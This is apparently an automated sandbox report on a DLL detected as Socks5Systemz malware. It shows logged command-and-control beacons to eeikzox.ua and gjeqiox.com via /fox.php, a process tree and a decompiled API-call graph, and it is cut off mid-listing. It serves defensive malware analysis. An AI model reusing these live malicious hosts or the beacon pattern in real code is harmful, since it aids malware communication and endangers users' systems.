                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.44975994.232.249.187807584C:\Windows\System32\loaddll32.exe
                            TimestampBytes transferredDirectionData
                            Dec 15, 2024 00:48:19.011759043 CET287OUTGET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1
                            Host: eeikzox.ua
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.44978794.232.249.187807584C:\Windows\System32\loaddll32.exe
                            TimestampBytes transferredDirectionData
                            Dec 15, 2024 00:48:32.301275015 CET287OUTGET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1
                            Host: eeikzox.ua
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.44981794.232.249.187807584C:\Windows\System32\loaddll32.exe
                            TimestampBytes transferredDirectionData
                            Dec 15, 2024 00:48:45.441265106 CET287OUTGET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1
                            Host: eeikzox.ua
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449874185.237.206.129807584C:\Windows\System32\loaddll32.exe
                            TimestampBytes transferredDirectionData
                            Dec 15, 2024 00:49:10.881289959 CET288OUTGET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1
                            Host: gjeqiox.com
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                            Dec 15, 2024 00:49:12.194669962 CET1120INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Sat, 14 Dec 2024 23:49:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.4.33
                            Data Raw: 33 39 30 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 34 35 39 33 35 66 62 30 61 34 38 39 65 34 61 30 39 63 35 66 62 61 35 39 37 61 66 65 61 36 38 38 63 33 66 30 66 33 66 31 63 39 36 39 32 30 39 64 30 34 61 35 37 39 64 30 61 64 33 30 33 38 37 31 31 61 38 62 66 66 34 34 66 39 62 34 38 39 36 33 66 30 31 38 64 32 66 38 30 35 39 38 36 39 61 33 61 32 38 36 64 34 33 61 32 32 31 32 62 37 30 63 32 39 35 37 39 32 61 38 65 39 37 64 61 33 37 35 33 34 63 38 36 64 62 30 63 66 38 31 31 63 65 64 39 35 37 62 32 32 37 33 39 30 31 35 36 63 62 35 66 33 66 64 39 35 61 66 65 32 32 38 37 34 37 34 64 61 62 32 64 65 61 61 35 31 31 39 31 35 62 35 64 62 63 62 36 61 62 38 38 65 39 64 36 61 33 34 62 65 31 66 62 62 65 39 32 64 65 32 36 33 39 38 32 31 65 62 63 33 33 65 62 36 66 31 38 61 38 62 38 36 30 61 65 30 34 63 31 62 36 37 38 39 30 31 65 61 65 63 62 39 32 33 38 34 32 39 64 62 39 64 32 33 32 39 64 65 33 38 30 66 65 31 61 66 39 34 31 63 30 35 32 32 36 63 36 32 30 61 66 39 32 32 [TRUNCATED]
                            Data Ascii: 390de2ffe912c1a5259eb23643d6c02a45935fb0a489e4a09c5fba597afea688c3f0f3f1c969209d04a579d0ad3038711a8bff44f9b48963f018d2f8059869a3a286d43a2212b70c295792a8e97da37534c86db0cf811ced957b227390156cb5f3fd95afe2287474dab2deaa511915b5dbcb6ab88e9d6a34be1fbbe92de2639821ebc33eb6f18a8b860ae04c1b678901eaecb9238429db9d2329de380fe1af941c05226c620af9225c3710c4f4f8ddcf1dbf27278493f3bb766ffb9222d3da3c77c793a1cff9e605e55a34dbea7fbd03f3f181e2a5bdb06d1420d55f60e073e80f1c07c8c83dc89075636c7b0436ff8fb745194e8568518fc09469d27ccf2a22456ec67cf613868a94af4f5d81a2506c3be88ddc9ed4f78de501d870629d7258cc37f135664174a81c2019fce96266489dac33c7101ba2151dcdf294e1b1ab90be7ed675f8043efe90414b7a7f7754a155793506ebcf6a0d9c11ea1760ca034e51f66007845d855c7e01226955272ecc5ca8ce526d1e53f3a17ad6513aa1c1a93e9af12e9dba705d9b98be9b96415f8d7bbde792c2371a97d9e80572d9b4d862e06fe1f69e072144da477d671a19d9996c1d51a78b58b9aac244550fc613cfae58023e0ae9a91677c280
                            Dec 15, 2024 00:49:15.664921999 CET296OUTGET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1
                            Host: gjeqiox.com
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                            Dec 15, 2024 00:49:16.187566042 CET220INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Sat, 14 Dec 2024 23:49:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.4.33
                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: ede2ff49a2e11370


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.450013185.237.206.129807584C:\Windows\System32\loaddll32.exe
                            TimestampBytes transferredDirectionData
                            Dec 15, 2024 00:50:16.316783905 CET296OUTGET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1
                            Host: gjeqiox.com
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                            Dec 15, 2024 00:50:17.587385893 CET976INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Sat, 14 Dec 2024 23:50:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.4.33
                            Data Raw: 33 30 30 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 63 30 65 35 35 38 32 34 65 30 66 64 62 65 37 61 36 39 31 62 39 61 35 32 62 63 65 36 64 36 31 37 63 35 62 63 66 64 64 35 33 64 63 34 38 35 66 63 62 34 39 38 39 35 61 65 61 34 31 66 36 62 62 66 36 34 34 39 39 35 36 39 37 33 39 30 61 39 32 32 66 38 35 34 37 39 61 39 63 33 66 33 63 36 65 34 36 61 31 33 66 32 34 37 37 63 39 39 32 36 37 32 64 38 38 38 32 64 61 33 36 35 66 34 63 38 65 64 33 30 37 65 37 31 30 63 39 63 37 35 64 62 33 32 66 33 35 31 65 35 34 63 62 35 63 32 61 64 61 35 63 66 38 32 32 38 32 34 61 34 36 62 30 32 63 65 64 62 62 31 62 39 30 35 30 35 32 61 33 62 37 61 33 38 39 66 63 64 36 61 35 35 36 66 65 66 61 62 30 39 61 63 31 32 37 33 39 38 35 30 62 62 63 33 39 65 64 37 62 31 38 61 30 62 39 37 65 61 34 30 32 64 62 62 35 36 36 39 39 31 37 61 64 64 35 39 30 33 39 34 62 38 32 62 39 64 33 32 39 39 36 65 35 38 32 65 30 31 62 66 32 34 66 64 62 34 64 32 64 63 33 33 34 61 66 39 36 32 [TRUNCATED]
                            Data Ascii: 300de2fe88e261d4749b96478393969f80739fc0e55824e0fdbe7a691b9a52bce6d617c5bcfdd53dc485fcb49895aea41f6bbf644995697390a922f85479a9c3f3c6e46a13f2477c992672d8882da365f4c8ed307e710c9c75db32f351e54cb5c2ada5cf822824a46b02cedbb1b905052a3b7a389fcd6a556fefab09ac12739850bbc39ed7b18a0b97ea402dbb5669917add590394b82b9d32996e582e01bf24fdb4d2dc334af9620dd7809424792ddf2d9e7777155203eb47df7ba20333ea8c47a67381aea9e635355a74aa9a9fbce3e3914132345da02db540d49f61006208bf4c1628d8cd8840b4830c4a54166f8f8715380ed509b19f30b418325c7f1ba274ee87cd0643e62b348f4f0d91f2d18c1b68cc4c5f55379c45e18990722de298bdd7a1d40600a4b9bc31f9bc393386189dbc03b791fb3284bc6de32470510b708f9ec6b5f8f58eeed0c09b7bef36a4b0b5c945770beffafd7dc1fa47e19a338e61f66037151db56d9e21b248b5073e3d3c997e339d4f93b3511b3641bab181296c70


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:18:47:17
                            Start date:14/12/2024
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll"
                            Imagebase:0x410000
                            File size:126'464 bytes
                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:false

                            Target ID:1
                            Start time:18:47:17
                            Start date:14/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:2
                            Start time:18:47:17
                            Start date:14/12/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
                            Imagebase:0x240000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:18:47:17
                            Start date:14/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
                            Imagebase:0xb50000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:18:47:17
                            Start date:14/12/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892
                            Imagebase:0x410000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:10.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:8.5%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:109
                              execution_graph 19963 6cf0aa40 CreateThread 19964 6ceb68fd InitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19963->19964 20069 6ceb4e58 19964->20069 19967 6ceb69b0 __wctomb_s_l 20072 6cecb71c 19967->20072 19970 6cecb71c _malloc 106 API calls 19971 6ceb69d4 19970->19971 19972 6cecb71c _malloc 106 API calls 19971->19972 19973 6ceb69e2 19972->19973 19974 6cecb71c _malloc 106 API calls 19973->19974 19975 6ceb69f3 19974->19975 19976 6cecb71c _malloc 106 API calls 19975->19976 19977 6ceb6a04 19976->19977 19978 6cecb71c _malloc 106 API calls 19977->19978 19979 6ceb6a12 19978->19979 19980 6cecb71c _malloc 106 API calls 19979->19980 19981 6ceb6a23 19980->19981 19982 6cecb71c _malloc 106 API calls 19981->19982 19983 6ceb6a31 6 API calls 19982->19983 19984 6ceb6a8f __wctomb_s_l 19983->19984 19985 6ceb6ab9 EnterCriticalSection LeaveCriticalSection 19984->19985 19986 6ceb6b24 19985->19986 19986->19986 19987 6cecb71c _malloc 106 API calls 19986->19987 19988 6ceb6b5a 19987->19988 19989 6cecb71c _malloc 106 API calls 19988->19989 19990 6ceb6b6b 19989->19990 19991 6cecb71c _malloc 106 API calls 19990->19991 19992 6ceb6b7c 19991->19992 19993 6cecb71c _malloc 106 API calls 19992->19993 19994 6ceb6b9d QueryPerformanceCounter Sleep 19993->19994 20089 6ceb66b9 19994->20089 19997 6cecb71c _malloc 106 API calls 19998 6ceb6be6 19997->19998 19999 6cecb71c _malloc 106 API calls 19998->19999 20058 6ceb6bf4 Mailbox __wctomb_s_l 19999->20058 20000 6ceb872c 20001 6ceb6c2d Sleep 20002 6ceb6c4d EnterCriticalSection LeaveCriticalSection 20001->20002 20002->20058 20003 6ceb6c42 Sleep 20003->20002 20004 6ceb6d97 GetTickCount 20004->20058 20005 6ceb6edd wsprintfA 20005->20058 20006 6ceb7142 wsprintfA 20006->20058 20007 6ceb6f4a wsprintfA 20007->20058 20008 6ceb6fb7 wsprintfA 20008->20058 20009 6ceb7407 wsprintfA 20009->20058 20010 6ceb71af wsprintfA 20010->20058 20011 6ceb7024 wsprintfA 20011->20058 20012 6ceb765f wsprintfA 20012->20058 20014 6ceb7474 wsprintfA 20014->20058 20015 6ceb721c wsprintfA 20015->20058 20016 6ceb708e wsprintfA 20016->20058 20017 6ceb76cc wsprintfA 20017->20058 20018 6ceb74e1 wsprintfA 20018->20058 20019 6ceb7289 wsprintfA 20019->20058 20020 6ceb78b7 wsprintfA 20020->20058 20021 6ceb7739 wsprintfA 20021->20058 20022 6ceb754e wsprintfA 20022->20058 20023 6ceb72f6 wsprintfA 20023->20058 20024 6ceb7924 wsprintfA 20024->20058 20025 6ceb77a6 wsprintfA 20025->20058 20026 6ceb75b8 wsprintfA 20026->20058 20027 6ceb7360 wsprintfA 20027->20058 20028 6ceb7991 wsprintfA 20028->20058 20029 6ceb7810 wsprintfA 20029->20058 20030 6ceb79fe wsprintfA 20030->20058 20031 6ceb7a68 wsprintfA 20031->20058 20032 6ceb7cb6 InternetOpenA 20033 6ceb7cdc InternetSetOptionA InternetSetOptionA InternetSetOptionA 20032->20033 20032->20058 20104 6cecd240 20033->20104 20036 6ceb7dc9 InternetCloseHandle 20036->20058 20037 6ceb7d7d InternetReadFile 20038 6ceb7da0 20037->20038 20038->20037 20039 6ceb7dbd InternetCloseHandle 20038->20039 20039->20036 20040 6ceb7e55 EnterCriticalSection LeaveCriticalSection 20106 6cecaaac 20040->20106 20042 6cecaaac 113 API calls 20042->20058 20043 6cecb71c _malloc 106 API calls 20044 6ceb7f0b EnterCriticalSection LeaveCriticalSection 20043->20044 20044->20058 20045 6ceb82db EnterCriticalSection LeaveCriticalSection 20045->20058 20049 6cecb71c 106 API calls _malloc 20049->20058 20052 6cecb6e4 106 API calls _free 20052->20058 20054 6cecbd39 107 API calls _strtok 20054->20058 20058->20000 20058->20001 20058->20002 20058->20003 20058->20004 20058->20005 20058->20006 20058->20007 20058->20008 20058->20009 20058->20010 20058->20011 20058->20012 20058->20014 20058->20015 20058->20016 20058->20017 20058->20018 20058->20019 20058->20020 20058->20021 20058->20022 20058->20023 20058->20024 20058->20025 20058->20026 20058->20027 20058->20028 20058->20029 20058->20030 20058->20031 20058->20032 20058->20040 20058->20042 20058->20043 20058->20045 20058->20049 20058->20052 20058->20054 20059 6cebef10 108 API calls 20058->20059 20060 6cebc967 221 API calls 20058->20060 20066 6ceb827c Sleep 20058->20066 20102 6ceb6227 LocalAlloc 20058->20102 20116 6cecc29f 20058->20116 20124 6cec38f7 20058->20124 20127 6ceb5ad9 20058->20127 20160 6cebf59c 20058->20160 20172 6ceb67e4 20058->20172 20175 6cecafc0 20058->20175 20178 6cecab88 20058->20178 20189 6ceb4525 20058->20189 20196 6ceb468e 20058->20196 20203 6ceb9de3 20058->20203 20212 6cec3c53 20058->20212 20217 6ceb3a6e 20058->20217 20225 6ceb3c0b 20058->20225 20232 6cebba20 20058->20232 20235 6ceb5d9a 20058->20235 20059->20058 20060->20058 20166 6ceb4d08 20066->20166 20245 6cec7f40 20069->20245 20071 6ceb4e73 GetTickCount GetVersionExA 20071->19967 20073 6cecb797 20072->20073 20079 6cecb728 20072->20079 20074 6ced0953 __calloc_impl DecodePointer 20073->20074 20075 6cecb79d 20074->20075 20076 6cece5ab __wsopen_helper 105 API calls 20075->20076 20088 6ceb69bd 20076->20088 20078 6cecb75b RtlAllocateHeap 20078->20079 20078->20088 20079->20078 20081 6cecb783 20079->20081 20082 6cecb733 20079->20082 20086 6cecb781 20079->20086 20316 6ced0953 DecodePointer 20079->20316 20318 6cece5ab 20081->20318 20082->20079 20269 6ced0e23 20082->20269 20278 6ced0e80 20082->20278 20313 6ced0a6c 20082->20313 20087 6cece5ab __wsopen_helper 105 API calls 20086->20087 20087->20088 20088->19970 20090 6cecb71c _malloc 106 API calls 20089->20090 20091 6ceb66c9 __wctomb_s_l 20090->20091 20092 6ceb66e5 SHGetSpecialFolderPathW lstrcpyW lstrcatW CreateFileW 20091->20092 20093 6ceb6738 ReadFile CloseHandle 20092->20093 20094 6ceb6772 20092->20094 20624 6ceb60ca 20093->20624 20627 6ceb3fec 20094->20627 20097 6ceb6770 20097->19997 20099 6ceb67a2 WriteFile CloseHandle 20100 6ceb67c0 20099->20100 20100->20097 20101 6ceb60ca 106 API calls 20100->20101 20101->20097 20103 6cefbea5 20102->20103 20105 6ceb7d4f InternetOpenUrlA 20104->20105 20105->20036 20105->20037 20107 6cecaab8 20106->20107 20108 6cecaadb 20106->20108 20107->20108 20109 6cecaabe 20107->20109 20632 6cecaaf3 20108->20632 20112 6cece5ab __wsopen_helper 106 API calls 20109->20112 20111 6cecaaee 20111->20058 20113 6cecaac3 20112->20113 20114 6cecd645 __wsopen_helper 9 API calls 20113->20114 20115 6cecaace 20114->20115 20115->20058 20118 6cecc2a7 20116->20118 20117 6cecb71c _malloc 106 API calls 20117->20118 20118->20117 20119 6cecc2c1 20118->20119 20120 6ced0953 __calloc_impl DecodePointer 20118->20120 20121 6cecc2c5 std::exception::exception 20118->20121 20119->20058 20120->20118 20940 6cecccaa 20121->20940 20123 6cecc2ef 20943 6cec5790 20124->20943 20126 6cec391d Mailbox 20126->20058 20128 6ceb5ae3 __EH_prolog 20127->20128 20946 6cec9270 20128->20946 20131 6ceb4525 108 API calls 20132 6ceb5b12 20131->20132 20950 6ceb9fb0 20132->20950 20134 6ceb5b1b Mailbox 20135 6ceb9de3 117 API calls 20134->20135 20136 6ceb5b2f Mailbox 20135->20136 20137 6ceb5d73 Mailbox 20136->20137 20953 6cebf07c 20136->20953 20137->20058 20140 6ceb5b8e Mailbox 20142 6cebf07c 108 API calls 20140->20142 20141 6ceb5c21 Mailbox 20143 6cebf07c 108 API calls 20141->20143 20144 6ceb5b9c Mailbox 20142->20144 20145 6ceb5c30 Mailbox 20143->20145 20144->20137 20147 6cebf07c 108 API calls 20144->20147 20145->20137 20146 6cebf07c 108 API calls 20145->20146 20149 6ceb5c76 Mailbox 20146->20149 20148 6ceb5be2 Mailbox 20147->20148 20148->20137 20150 6cebf07c 108 API calls 20148->20150 20149->20137 20151 6cebf07c 108 API calls 20149->20151 20152 6ceb5c0f Mailbox 20150->20152 20154 6ceb5ca3 Mailbox 20151->20154 20152->20137 20153 6cebf07c 108 API calls 20152->20153 20156 6ceb5d50 Mailbox 20153->20156 20154->20137 20155 6cebf07c 108 API calls 20154->20155 20158 6ceb5ceb Mailbox 20155->20158 20957 6cebf277 20156->20957 20158->20137 20159 6cebf07c 108 API calls 20158->20159 20159->20152 20161 6cebf5c6 20160->20161 21107 6cec3c0e 20161->21107 20163 6cebf5e0 Mailbox 21110 6ceb4cd2 20163->21110 20167 6ceb4d12 __EH_prolog 20166->20167 21440 6ceca060 20167->21440 20173 6cecb71c _malloc 106 API calls 20172->20173 20174 6ceb67f4 20173->20174 21457 6cecafde 20175->21457 20177 6cecafd9 20177->20058 20179 6cecabb9 20178->20179 20180 6cecaba4 20178->20180 20179->20180 20181 6cecabc0 20179->20181 20182 6cece5ab __wsopen_helper 106 API calls 20180->20182 21463 6cece7a0 20181->21463 20184 6cecaba9 20182->20184 20186 6cecd645 __wsopen_helper 9 API calls 20184->20186 20187 6cecabb4 20186->20187 20187->20058 20190 6cec9270 Mailbox 106 API calls 20189->20190 20191 6ceb453c 20190->20191 21688 6ceb4560 20191->21688 20197 6ceb46db htons 20196->20197 20198 6ceb46a9 htons 20196->20198 21742 6ceb44d3 20197->21742 21736 6ceb448f 20198->21736 20202 6ceb46fd 20202->20058 20204 6ceb9e03 20203->20204 20207 6ceb9e6b 20204->20207 20208 6ceb9e51 20204->20208 20211 6ceb9e69 20204->20211 20206 6ceb9e9f 20206->20058 20210 6ceb1c52 106 API calls 20207->20210 21775 6cebc867 20208->21775 20210->20211 20211->20206 21779 6ceb3061 20211->21779 20213 6ceb190f 106 API calls 20212->20213 20214 6cec3c64 20213->20214 20215 6cec3d59 20214->20215 21886 6cec72e9 20214->21886 20215->20058 20218 6ceb3a8e WSASetLastError shutdown 20217->20218 20219 6ceb3a7d 20217->20219 20221 6cebe8bd WSAGetLastError 20218->20221 20220 6cebe893 106 API calls 20219->20220 20224 6ceb3a8c 20220->20224 20222 6ceb3aaa 20221->20222 20223 6cec9270 Mailbox 106 API calls 20222->20223 20222->20224 20223->20224 20224->20058 20226 6ceb3c3a 20225->20226 20227 6ceb3c1d InterlockedCompareExchange 20225->20227 20229 6ceb2f6a 106 API calls 20226->20229 20227->20226 20228 6ceb3c2f 20227->20228 21890 6ceb3954 20228->21890 20231 6ceb3c4a 20229->20231 20231->20058 21975 6ceb3bb0 20232->21975 20234 6cebba59 20234->20058 20236 6cecb71c _malloc 106 API calls 20235->20236 20237 6ceb5daf SHGetSpecialFolderPathA 20236->20237 20238 6ceb5dc5 20237->20238 21991 6cecbec4 20238->21991 20241 6ceb5e2f 20241->20058 20243 6ceb5e29 22007 6cecc1d7 20243->22007 20254 6cec8003 CreateFileA 20245->20254 20250 6cec7ff1 20250->20071 20251 6cec7fa1 CreateFileA 20251->20250 20252 6cec7fc6 GetFileTime CloseHandle 20251->20252 20252->20250 20253 6cec7fe1 20252->20253 20253->20250 20255 6cec7f84 20254->20255 20256 6cec8034 20254->20256 20261 6cec8107 LoadLibraryA 20255->20261 20257 6cec804c DeviceIoControl 20256->20257 20258 6cec80f5 CloseHandle 20256->20258 20259 6cec80c1 GetLastError 20256->20259 20260 6cecc29f Mailbox 106 API calls 20256->20260 20257->20256 20258->20255 20259->20256 20259->20258 20260->20256 20262 6cec7f8d GetWindowsDirectoryA 20261->20262 20263 6cec8130 GetProcAddress 20261->20263 20262->20250 20262->20251 20264 6cec81e3 FreeLibrary 20263->20264 20267 6cec8144 20263->20267 20264->20262 20265 6cec8156 GetAdaptersInfo 20265->20267 20266 6cec81de 20266->20264 20267->20265 20267->20266 20268 6cecc29f Mailbox 106 API calls 20267->20268 20268->20267 20321 6ced8f2e 20269->20321 20271 6ced0e2a 20272 6ced8f2e __FF_MSGBANNER 106 API calls 20271->20272 20274 6ced0e37 20271->20274 20272->20274 20273 6ced0e80 __NMSG_WRITE 106 API calls 20275 6ced0e4f 20273->20275 20274->20273 20276 6ced0e59 20274->20276 20277 6ced0e80 __NMSG_WRITE 106 API calls 20275->20277 20276->20082 20277->20276 20279 6ced0e9e __NMSG_WRITE 20278->20279 20281 6ced8f2e __FF_MSGBANNER 102 API calls 20279->20281 20312 6ced0fc5 20279->20312 20280 6ceccc9b _$I10_OUTPUT 6 API calls 20282 6ced102e 20280->20282 20283 6ced0eb1 20281->20283 20282->20082 20284 6ced0fca GetStdHandle 20283->20284 20285 6ced8f2e __FF_MSGBANNER 102 API calls 20283->20285 20288 6ced0fd8 _strlen 20284->20288 20284->20312 20286 6ced0ec2 20285->20286 20286->20284 20287 6ced0ed4 20286->20287 20287->20312 20365 6ced840d 20287->20365 20290 6ced1011 WriteFile 20288->20290 20288->20312 20290->20312 20292 6ced0f01 GetModuleFileNameW 20294 6ced0f21 20292->20294 20304 6ced0f31 __NMSG_WRITE 20292->20304 20293 6ced1032 20295 6cecd655 __invoke_watson 8 API calls 20293->20295 20296 6ced840d __NMSG_WRITE 102 API calls 20294->20296 20297 6ced103c 20295->20297 20296->20304 20298 6ced1061 EnterCriticalSection 20297->20298 20417 6ced10c5 20297->20417 20298->20082 20299 6ced0f77 20299->20293 20383 6ced83a1 20299->20383 20303 6ced1054 20303->20298 20439 6ced0b8f 20303->20439 20304->20293 20304->20299 20374 6ced8482 20304->20374 20306 6ced83a1 __NMSG_WRITE 102 API calls 20309 6ced0fae 20306->20309 20309->20293 20310 6ced0fb5 20309->20310 20392 6ced8f6e EncodePointer 20310->20392 20312->20280 20568 6ced0a38 GetModuleHandleExW 20313->20568 20317 6ced0966 20316->20317 20317->20079 20571 6cece3c2 GetLastError 20318->20571 20320 6cece5b0 20320->20086 20322 6ced8f38 20321->20322 20323 6ced8f42 20322->20323 20324 6cece5ab __wsopen_helper 106 API calls 20322->20324 20323->20271 20325 6ced8f5e 20324->20325 20328 6cecd645 20325->20328 20331 6cecd61a DecodePointer 20328->20331 20332 6cecd62d 20331->20332 20337 6cecd655 IsProcessorFeaturePresent 20332->20337 20335 6cecd61a __wsopen_helper 8 API calls 20336 6cecd651 20335->20336 20336->20271 20338 6cecd660 20337->20338 20343 6cecd4e8 20338->20343 20342 6cecd644 20342->20335 20344 6cecd502 __wctomb_s_l __call_reportfault 20343->20344 20345 6cecd522 IsDebuggerPresent 20344->20345 20351 6ced1a28 SetUnhandledExceptionFilter UnhandledExceptionFilter 20345->20351 20348 6cecd5e6 __call_reportfault 20352 6ceccc9b 20348->20352 20349 6cecd609 20350 6ced1a13 GetCurrentProcess TerminateProcess 20349->20350 20350->20342 20351->20348 20353 6ceccca5 IsProcessorFeaturePresent 20352->20353 20354 6ceccca3 20352->20354 20356 6ced1a8f 20353->20356 20354->20349 20359 6ced1a3e IsDebuggerPresent 20356->20359 20360 6ced1a53 __call_reportfault 20359->20360 20361 6ced1a28 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 20360->20361 20362 6ced1a5b __call_reportfault 20361->20362 20363 6ced1a13 __invoke_watson GetCurrentProcess TerminateProcess 20362->20363 20364 6ced1a78 20363->20364 20364->20349 20366 6ced8418 20365->20366 20367 6ced8426 20365->20367 20366->20367 20372 6ced843f 20366->20372 20368 6cece5ab __wsopen_helper 106 API calls 20367->20368 20369 6ced8430 20368->20369 20370 6cecd645 __wsopen_helper 9 API calls 20369->20370 20371 6ced0ef4 20370->20371 20371->20292 20371->20293 20372->20371 20373 6cece5ab __wsopen_helper 106 API calls 20372->20373 20373->20369 20378 6ced8490 20374->20378 20375 6ced8494 20376 6ced8499 20375->20376 20377 6cece5ab __wsopen_helper 106 API calls 20375->20377 20376->20299 20379 6ced84c4 20377->20379 20378->20375 20378->20376 20381 6ced84d3 20378->20381 20380 6cecd645 __wsopen_helper 9 API calls 20379->20380 20380->20376 20381->20376 20382 6cece5ab __wsopen_helper 106 API calls 20381->20382 20382->20379 20384 6ced83bb 20383->20384 20387 6ced83ad 20383->20387 20385 6cece5ab __wsopen_helper 106 API calls 20384->20385 20386 6ced83c5 20385->20386 20388 6cecd645 __wsopen_helper 9 API calls 20386->20388 20387->20384 20390 6ced83e7 20387->20390 20389 6ced0f97 20388->20389 20389->20293 20389->20306 20390->20389 20391 6cece5ab __wsopen_helper 106 API calls 20390->20391 20391->20386 20393 6ced8fa2 ___crtIsPackagedApp 20392->20393 20394 6ced9061 IsDebuggerPresent 20393->20394 20395 6ced8fb1 LoadLibraryExW 20393->20395 20396 6ced906b 20394->20396 20397 6ced9086 20394->20397 20398 6ced8fee GetProcAddress 20395->20398 20399 6ced8fc8 GetLastError 20395->20399 20400 6ced9079 20396->20400 20401 6ced9072 OutputDebugStringW 20396->20401 20397->20400 20402 6ced908b DecodePointer 20397->20402 20404 6ced9002 7 API calls 20398->20404 20405 6ced907e 20398->20405 20403 6ced8fd7 LoadLibraryExW 20399->20403 20399->20405 20400->20405 20411 6ced90b2 DecodePointer DecodePointer 20400->20411 20415 6ced90ca 20400->20415 20401->20400 20402->20405 20403->20398 20403->20405 20406 6ced905e 20404->20406 20407 6ced904a GetProcAddress EncodePointer 20404->20407 20408 6ceccc9b 